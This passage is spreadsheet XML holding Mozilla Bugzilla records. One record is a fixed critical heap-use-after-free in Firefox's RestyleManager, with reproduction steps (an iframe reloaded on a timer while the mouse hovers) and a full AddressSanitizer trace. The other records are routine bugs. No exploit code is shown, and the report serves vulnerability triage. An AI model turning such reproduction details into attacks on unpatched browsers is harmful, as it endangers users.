          <t>Heap-use-after-free in mozilla::RestyleManager::GetHoverGeneration()</t>
        </is>
      </c>
      <c r="D4102" t="inlineStr">
        <is>
          <t>2024-05-30 08:08:34 -0700</t>
        </is>
      </c>
      <c r="E4102" t="n">
        <v>1</v>
      </c>
      <c r="F4102" t="n">
        <v>1</v>
      </c>
      <c r="G4102" t="n">
        <v>3</v>
      </c>
      <c r="H4102" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4102" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4102" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K4102" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4102" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4102" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4102" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4102" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4102" t="inlineStr">
        <is>
          <t>[reporter-external][fixed in bug 930381 but not a dupe][adv-main26+][adv-esr24.2+]</t>
        </is>
      </c>
      <c r="Q4102" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4102" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4102" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T4102" t="n">
        <v>1</v>
      </c>
      <c r="U4102" t="n">
        <v>0</v>
      </c>
      <c r="V4102" t="n">
        <v>14</v>
      </c>
      <c r="W4102" t="inlineStr">
        <is>
          <t>Created attachment 824201
repro.html
Tested in:
OS: Ubuntu 12.04
Firefox: debug ASAN-build from https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan-debug/1383057658/
Repro-file has two parts. 
run.html opens repro.html in an iframe and reloads it with 400ms interval via onload-event. To reproduce the issue open run.html with Firefox and move mouse cursor into the area of the iframe on the page.
ASAN-report:
==15391==ERROR: AddressSanitizer: heap-use-after-free on address 0x6170001e8f1c at pc 0x7f031be759fe bp 0x7ffffaed2b20 sp 0x7ffffaed2b18
READ of size 4 at 0x6170001e8f1c thread T0
    #0 0x7f031be759fd in mozilla::RestyleManager::GetHoverGeneration() const /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/RestyleManager.h:75:0
    #1 0x7f031be7594e in PresShell::DispatchSynthMouseMove(mozilla::WidgetGUIEvent*, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsPresShell.cpp:3416:0
    #2 0x7f031be7f1b1 in PresShell::ProcessSynthMouseMoveEvent(bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsPresShell.cpp:5256:0
    #3 0x7f031bea0d6d in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsRefreshDriver.cpp:1074:0
    #4 0x7f031bea6d5d in mozilla::RefreshDriverTimer::Tick() /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsRefreshDriver.cpp:160:0
    #5 0x7f031eb1ccb6 in nsTimerImpl::Fire() /builds/slave/m-cen-l64-asan-d-0000000000000/build/xpcom/threads/nsTimerImpl.cpp:546:0
    #6 0x7f031eb1d45e in nsTimerEvent::Run() /builds/slave/m-cen-l64-asan-d-0000000000000/build/xpcom/threads/nsTimerImpl.cpp:630:0
    #7 0x7f031eb141ce in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/xpcom/threads/nsThread.cpp:622:0
    #8 0x7f031ea6501f in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/xpcom/glue/nsThreadUtils.cpp:251:0
    #9 0x7f031dc72e77 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/ipc/glue/MessagePump.cpp:85:0
    #10 0x7f031ebff270 in MessageLoop::RunInternal() /builds/slave/m-cen-l64-asan-d-0000000000000/build/ipc/chromium/src/base/message_loop.cc:220:0
    #11 0x7f031ebff074 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-d-0000000000000/build/ipc/chromium/src/base/message_loop.cc:187:0
    #12 0x7f031da8dfd0 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-d-0000000000000/build/widget/xpwidgets/nsBaseAppShell.cpp:161:0
    #13 0x7f031d5f7ad5 in nsAppStartup::Run() /builds/slave/m-cen-l64-asan-d-0000000000000/build/toolkit/components/startup/nsAppStartup.cpp:268:0
    #14 0x7f031b438c3b in XREMain::XRE_mainRun() /builds/slave/m-cen-l64-asan-d-0000000000000/build/toolkit/xre/nsAppRunner.cpp:3976:0
    #15 0x7f031b439fa8 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/toolkit/xre/nsAppRunner.cpp:4044:0
    #16 0x7f031b43a925 in XRE_main /builds/slave/m-cen-l64-asan-d-0000000000000/build/toolkit/xre/nsAppRunner.cpp:4246:0
    #17 0x45a0f5 in do_main(int, char**, nsIFile*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/browser/app/nsBrowserApp.cpp:275:0
    #18 0x459667 in main /builds/slave/m-cen-l64-asan-d-0000000000000/build/browser/app/nsBrowserApp.cpp:635:0
    #19 0x7f032bb8676c in __libc_start_main /build/buildd/eglibc-2.15/csu/libc-start.c:226:0
    #20 0x45937c in _start ??:0
0x6170001e8f1c is located 28 bytes inside of 760-byte region [0x6170001e8f00,0x6170001e91f8)
freed by thread T0 here:
    #0 0x446285 in __interceptor_free _asan_rtl_:0
    #1 0x7f031be5fc05 in operator delete(void*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/obj-firefox/layout/base/../../dist/include/mozilla/mozalloc.h:225:0
    #2 0x7f031be5fc05 in mozilla::RestyleManager::Release() /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/RestyleManager.h:38:0
    #3 0x7f031be5682d in nsRefPtr&lt;mozilla::RestyleManager&gt;::operator=(mozilla::RestyleManager*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/obj-firefox/layout/base/../../dist/include/nsAutoPtr.h:943:0
    #4 0x7f031be526aa in nsPresContext::SetShell(nsIPresShell*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsPresContext.cpp:1109:0
    #5 0x7f031be66efd in PresShell::Destroy() /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsPresShell.cpp:1058:0
    #6 0x7f031be0cc56 in nsDocumentViewer::DestroyPresShell() /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsDocumentViewer.cpp:4334:0
    #7 0x7f031be0f3ba in nsDocumentViewer::Hide() /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsDocumentViewer.cpp:2023:0
    #8 0x7f031eefbc78 in nsDocShell::SetVisibility(bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/docshell/base/nsDocShell.cpp:5523:0
    #9 0x7f031eefbcd3 in non-virtual thunk to nsDocShell::SetVisibility(bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/docshell/base/nsDocShell.cpp:5527:0
    #10 0x7f031c489097 in nsFrameLoader::Hide() /builds/slave/m-cen-l64-asan-d-0000000000000/build/content/base/src/nsFrameLoader.cpp:997:0
    #11 0x7f031c031d78 in nsHideViewer::Run() /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsSubDocumentFrame.cpp:780:0
    #12 0x7f031c3c4b6d in nsContentUtils::RemoveScriptBlocker() /builds/slave/m-cen-l64-asan-d-0000000000000/build/content/base/src/nsContentUtils.cpp:4786:0
    #13 0x7f031c406f1d in nsDocument::EndUpdate(unsigned int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/content/base/src/nsDocument.cpp:4471:0
    #14 0x7f031c80cdc6 in nsHTMLDocument::EndUpdate(unsigned int) /builds/slave/m-cen-l64-asan-d-0000000000000/build/content/html/document/src/nsHTMLDocument.cpp:2427:0
    #15 0x7f031bf9ed7f in mozAutoDocUpdate::~mozAutoDocUpdate() /builds/slave/m-cen-l64-asan-d-0000000000000/build/content/base/src/mozAutoDocUpdate.h:38:0
    #16 0x7f031c4c36e7 in nsINode::doRemoveChildAt(unsigned int, bool, nsIContent*, nsAttrAndChildArray&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/content/base/src/nsINode.cpp:1522:0
    #17 0x7f031c3626f7 in mozilla::dom::FragmentOrElement::RemoveChildAt(unsigned int, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/content/base/src/FragmentOrElement.cpp:963:0
    #18 0x7f031c4bdc1b in nsINode::RemoveChild(nsINode&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/content/base/src/nsINode.cpp:458:0
    #19 0x7f031e5b17b2 in mozilla::dom::NodeBinding::removeChild(JSContext*, JS::Handle&lt;JSObject*&gt;, nsINode*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/obj-firefox/dom/bindings/./NodeBinding.cpp:628:0
    #20 0x7f031e5af0ed in mozilla::dom::NodeBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/obj-firefox/dom/bindings/./NodeBinding.cpp:1231:0
    #21 0x7f0320495683 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/js/src/jscntxtinlines.h:220:0
    #22 0x7f0320494d95 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-d-0000000000000/build/js/src/vm/Interpreter.cpp:455:16
    #23 0x7f03204889cd in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/js/src/vm/Interpreter.cpp:2499:0
    #24 0x7f032047766b in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/js/src/vm/Interpreter.cpp:419:0
    #25 0x7f0320494ee7 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-d-0000000000000/build/js/src/vm/Interpreter.cpp:481:0
    #26 0x7f0320495a4c in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/js/src/vm/Interpreter.cpp:512:0
    #27 0x7f0320324228 in js::DirectProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/js/src/jsproxy.cpp:454:0
    #28 0x7f03203ed791 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/js/src/jswrapper.cpp:454:0
    #29 0x7f0320337801 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/slave/m-cen-l64-asan-d-0000000000000/build/js/src/jsproxy.cpp:2643:0
    #30 0x7f032033b7f0 in proxy_Call(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/js/src/jsproxy.cpp:3037:0
previously allocated by thread T0 here:
    #0 0x4463c5 in malloc _asan_rtl_:0
    #1 0x7f03258ee7d7 in moz_xmalloc /builds/slave/m-cen-l64-asan-d-0000000000000/build/memory/mozalloc/mozalloc.cpp:54:0
    #2 0x7f031be56062 in operator new(unsigned long) /builds/slave/m-cen-l64-asan-d-0000000000000/build/obj-firefox/layout/base/../../dist/include/mozilla/mozalloc.h:201:0
    #3 0x7f031be56062 in nsPresContext::Init(nsDeviceContext*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsPresContext.cpp:931:0
    #4 0x7f031be0ead3 in nsDocumentViewer::Show() /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsDocumentViewer.cpp:1946:0
    #5 0x7f031eefbc78 in nsDocShell::SetVisibility(bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/docshell/base/nsDocShell.cpp:5523:0
    #6 0x7f031eefbcd3 in non-virtual thunk to nsDocShell::SetVisibility(bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/docshell/base/nsDocShell.cpp:5527:0
    #7 0x7f031c48855d in nsFrameLoader::Show(int, int, int, int, nsSubDocumentFrame*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/content/base/src/nsFrameLoader.cpp:846:0
    #8 0x7f031c02c295 in nsSubDocumentFrame::ShowViewer() /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsSubDocumentFrame.cpp:188:27
    #9 0x7f031c031e98 in AsyncFrameInit::Run() /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsSubDocumentFrame.cpp:82:0
    #10 0x7f031c3c4b6d in nsContentUtils::RemoveScriptBlocker() /builds/slave/m-cen-l64-asan-d-0000000000000/build/content/base/src/nsContentUtils.cpp:4786:0
    #11 0x7f031bd8eb0d in nsAutoScriptBlocker::~nsAutoScriptBlocker() /builds/slave/m-cen-l64-asan-d-0000000000000/build/obj-firefox/toolkit/components/places/../../../dist/include/nsContentUtils.h:2200:0
    #12 0x7f031be775cd in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsPresShell.cpp:3831:0
    #13 0x7f031bea152a in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsRefreshDriver.cpp:1139:0
    #14 0x7f031bea6d5d in mozilla::RefreshDriverTimer::Tick() /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsRefreshDriver.cpp:160:0
    #15 0x7f031eb1ccb6 in nsTimerImpl::Fire() /builds/slave/m-cen-l64-asan-d-0000000000000/build/xpcom/threads/nsTimerImpl.cpp:546:0
    #16 0x7f031eb1d45e in nsTimerEvent::Run() /builds/slave/m-cen-l64-asan-d-0000000000000/build/xpcom/threads/nsTimerImpl.cpp:630:0
    #17 0x7f031eb141ce in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/xpcom/threads/nsThread.cpp:622:0
    #18 0x7f031ea6501f in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-d-0000000000000/build/xpcom/glue/nsThreadUtils.cpp:251:0
    #19 0x7f031dc72e77 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/ipc/glue/MessagePump.cpp:85:0
    #20 0x7f031ebff270 in MessageLoop::RunInternal() /builds/slave/m-cen-l64-asan-d-0000000000000/build/ipc/chromium/src/base/message_loop.cc:220:0
    #21 0x7f031ebff074 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-d-0000000000000/build/ipc/chromium/src/base/message_loop.cc:187:0
    #22 0x7f031da8dfd0 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-d-0000000000000/build/widget/xpwidgets/nsBaseAppShell.cpp:161:0
    #23 0x7f031d5f7ad5 in nsAppStartup::Run() /builds/slave/m-cen-l64-asan-d-0000000000000/build/toolkit/components/startup/nsAppStartup.cpp:268:0
    #24 0x7f031b438c3b in XREMain::XRE_mainRun() /builds/slave/m-cen-l64-asan-d-0000000000000/build/toolkit/xre/nsAppRunner.cpp:3976:0
    #25 0x7f031b439fa8 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/toolkit/xre/nsAppRunner.cpp:4044:0
    #26 0x7f031b43a925 in XRE_main /builds/slave/m-cen-l64-asan-d-0000000000000/build/toolkit/xre/nsAppRunner.cpp:4246:0
    #27 0x45a0f5 in do_main(int, char**, nsIFile*) /builds/slave/m-cen-l64-asan-d-0000000000000/build/browser/app/nsBrowserApp.cpp:275:0
    #28 0x459667 in main /builds/slave/m-cen-l64-asan-d-0000000000000/build/browser/app/nsBrowserApp.cpp:635:0
    #29 0x7f032bb8676c in __libc_start_main /build/buildd/eglibc-2.15/csu/libc-start.c:226:0
Shadow bytes around the buggy address:
  0x0c2e80035190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2e800351a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2e800351b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2e800351c0: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa
  0x0c2e800351d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c2e800351e0: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e800351f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80035200: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80035210: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80035220: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80035230: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd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15391==ABORTING
In addition to ASAN-output the debug-build also throws few assertions but I'm not sure if those are directly related.
###!!! ASSERTION: non-root reflow roots must not have scrollable overflow: 'target == rootFrame || desiredSize.ScrollableOverflow().IsEqualEdges(boundsRelativeToTarget)', file /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/base/nsPresShell.cpp, line 7937
###!!! ASSERTION: Shouldn't have unconstrained stuff here thanks to ComputeAutoSize: 'NS_INTRINSICSIZE != aReflowState.ComputedHeight()', file /builds/slave/m-cen-l64-asan-d-0000000000000/build/layout/generic/nsLeafFrame.cpp, line 75</t>
        </is>
      </c>
      <c r="X4102" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4103">
      <c r="A4103" t="n">
        <v>1529441</v>
      </c>
      <c r="B4103" t="inlineStr">
        <is>
          <t>2019-02-20 17:59:13 -0800</t>
        </is>
      </c>
      <c r="C4103" t="inlineStr">
        <is>
          <t>Is the "platform" keyword still valid?</t>
        </is>
      </c>
      <c r="D4103" t="inlineStr">
        <is>
          <t>2020-07-24 00:02:04 -0700</t>
        </is>
      </c>
      <c r="E4103" t="n">
        <v>1</v>
      </c>
      <c r="F4103" t="n">
        <v>1</v>
      </c>
      <c r="G4103" t="n">
        <v>7</v>
      </c>
      <c r="H4103" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4103" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J4103" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K4103" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L4103" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4103" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4103" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4103" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4103" t="inlineStr"/>
      <c r="Q4103" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4103" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4103" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4103" t="n">
        <v>1</v>
      </c>
      <c r="U4103" t="n">
        <v>0</v>
      </c>
      <c r="V4103" t="n">
        <v>7</v>
      </c>
      <c r="W4103" t="inlineStr">
        <is>
          <t>There are a small number of bugs which use the `platform` keyword. 
This is referring to an older, obsolete version of Mozilla-as-platform. 
Should we keep this keyword around, and if so, how should it be defined?</t>
        </is>
      </c>
      <c r="X4103" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4104">
      <c r="A4104" t="n">
        <v>442887</v>
      </c>
      <c r="B4104" t="inlineStr">
        <is>
          <t>2008-07-01 03:37:19 -0700</t>
        </is>
      </c>
      <c r="C4104" t="inlineStr">
        <is>
          <t>qm-xserve01 needs repair</t>
        </is>
      </c>
      <c r="D4104" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4104" t="n">
        <v>1</v>
      </c>
      <c r="F4104" t="n">
        <v>1</v>
      </c>
      <c r="G4104" t="n">
        <v>5</v>
      </c>
      <c r="H4104" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4104" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4104" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4104" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4104" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4104" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4104" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4104" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4104" t="inlineStr"/>
      <c r="Q4104" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4104" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4104" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4104" t="n">
        <v>1</v>
      </c>
      <c r="U4104" t="n">
        <v>0</v>
      </c>
      <c r="V4104" t="n">
        <v>12</v>
      </c>
      <c r="W4104" t="inlineStr">
        <is>
          <t>Please fix qm-xserve01 (dep unit test) on the Firefox tree. I broke it last night debugging some Firefox 3.0.1 nissues, and I couldn't get it working again.
Sorry for the inconvenience.
Thanks,
~reed</t>
        </is>
      </c>
      <c r="X4104" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4105">
      <c r="A4105" t="n">
        <v>1214310</v>
      </c>
      <c r="B4105" t="inlineStr">
        <is>
          <t>2015-10-13 11:14:54 -0700</t>
        </is>
      </c>
      <c r="C4105" t="inlineStr">
        <is>
          <t>Markdown code blocks can display comments from other bugs</t>
        </is>
      </c>
      <c r="D4105" t="inlineStr">
        <is>
          <t>2015-10-27 11:55:10 -0700</t>
        </is>
      </c>
      <c r="E4105" t="n">
        <v>1</v>
      </c>
      <c r="F4105" t="n">
        <v>1</v>
      </c>
      <c r="G4105" t="n">
        <v>4</v>
      </c>
      <c r="H4105" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4105" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4105" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K4105" t="inlineStr">
        <is>
          <t>5.1</t>
        </is>
      </c>
      <c r="L4105" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4105" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4105" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4105" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4105" t="inlineStr"/>
      <c r="Q4105" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4105" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4105" t="inlineStr">
        <is>
          <t>Bugzilla 6.0</t>
        </is>
      </c>
      <c r="T4105" t="n">
        <v>1</v>
      </c>
      <c r="U4105" t="n">
        <v>0</v>
      </c>
      <c r="V4105" t="n">
        <v>37</v>
      </c>
      <c r="W4105" t="inlineStr">
        <is>
          <t>I am seeing cases where Bugzilla is displaying ticket A with code blocks from ticket B.  
I believe the issue is that Markdown::_removeFencedCodeBlocks uses the global variable, @code_blocks.  Said variable should instead be defined as an instance variable.</t>
        </is>
      </c>
      <c r="X4105" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4106">
      <c r="A4106" t="n">
        <v>650874</v>
      </c>
      <c r="B4106" t="inlineStr">
        <is>
          <t>2011-04-18 11:31:37 -0700</t>
        </is>
      </c>
      <c r="C4106" t="inlineStr">
        <is>
          <t>crash [@ ExecuteTree]</t>
        </is>
      </c>
      <c r="D4106" t="inlineStr">
        <is>
          <t>2013-03-13 05:01:11 -0700</t>
        </is>
      </c>
      <c r="E4106" t="n">
        <v>1</v>
      </c>
      <c r="F4106" t="n">
        <v>1</v>
      </c>
      <c r="G4106" t="n">
        <v>3</v>
      </c>
      <c r="H4106" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4106" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4106" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4106" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L4106" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4106" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4106" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4106" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4106" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4106" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4106" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4106" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4106" t="n">
        <v>1</v>
      </c>
      <c r="U4106" t="n">
        <v>0</v>
      </c>
      <c r="V4106" t="n">
        <v>56</v>
      </c>
      <c r="W4106" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
error crash reporter
Reproducible: Always</t>
        </is>
      </c>
      <c r="X4106" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4107">
      <c r="A4107" t="n">
        <v>793841</v>
      </c>
      <c r="B4107" t="inlineStr">
        <is>
          <t>2012-09-24 13:58:40 -0700</t>
        </is>
      </c>
      <c r="C4107" t="inlineStr">
        <is>
          <t>Change Bugzilla Data Source To xmlrpc api</t>
        </is>
      </c>
      <c r="D4107" t="inlineStr">
        <is>
          <t>2012-10-01 19:36:32 -0700</t>
        </is>
      </c>
      <c r="E4107" t="n">
        <v>1</v>
      </c>
      <c r="F4107" t="n">
        <v>1</v>
      </c>
      <c r="G4107" t="n">
        <v>5</v>
      </c>
      <c r="H4107" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4107" t="inlineStr">
        <is>
          <t>Websites</t>
        </is>
      </c>
      <c r="J4107" t="inlineStr">
        <is>
          <t>Scrumbugs</t>
        </is>
      </c>
      <c r="K4107" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4107" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4107" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4107" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4107" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4107" t="inlineStr">
        <is>
          <t>u=admin c=bugzilla p=3</t>
        </is>
      </c>
      <c r="Q4107" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4107" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4107" t="inlineStr">
        <is>
          <t>Future</t>
        </is>
      </c>
      <c r="T4107" t="n">
        <v>1</v>
      </c>
      <c r="U4107" t="n">
        <v>0</v>
      </c>
      <c r="V4107" t="n">
        <v>3</v>
      </c>
      <c r="W4107" t="inlineStr">
        <is>
          <t>Change Bugzilla Data Source To xmlrpc api 
See https://github.com/mozilla/scrumbugz/pull/87</t>
        </is>
      </c>
      <c r="X4107" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4108">
      <c r="A4108" t="n">
        <v>1503326</v>
      </c>
      <c r="B4108" t="inlineStr">
        <is>
          <t>2018-10-30 09:25:49 -0700</t>
        </is>
      </c>
      <c r="C4108" t="inlineStr">
        <is>
          <t>Crash [@ ??] with asm.js and SIGTRAP</t>
        </is>
      </c>
      <c r="D4108" t="inlineStr">
        <is>
          <t>2023-12-06 07:51:21 -0800</t>
        </is>
      </c>
      <c r="E4108" t="n">
        <v>1</v>
      </c>
      <c r="F4108" t="n">
        <v>1</v>
      </c>
      <c r="G4108" t="n">
        <v>3</v>
      </c>
      <c r="H4108" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4108" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4108" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4108" t="inlineStr">
